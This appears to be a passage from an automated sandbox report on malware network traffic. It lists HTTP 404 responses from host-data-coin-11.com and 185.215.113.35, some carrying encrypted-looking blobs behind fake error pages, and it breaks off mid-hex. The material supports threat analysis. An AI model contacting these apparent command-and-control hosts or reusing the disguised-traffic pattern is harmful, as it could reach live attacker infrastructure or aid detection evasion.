                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 41 5b bb 06 f5 ee 66 b9 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevA[fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 88 30 e4 00 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OV=AIS00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 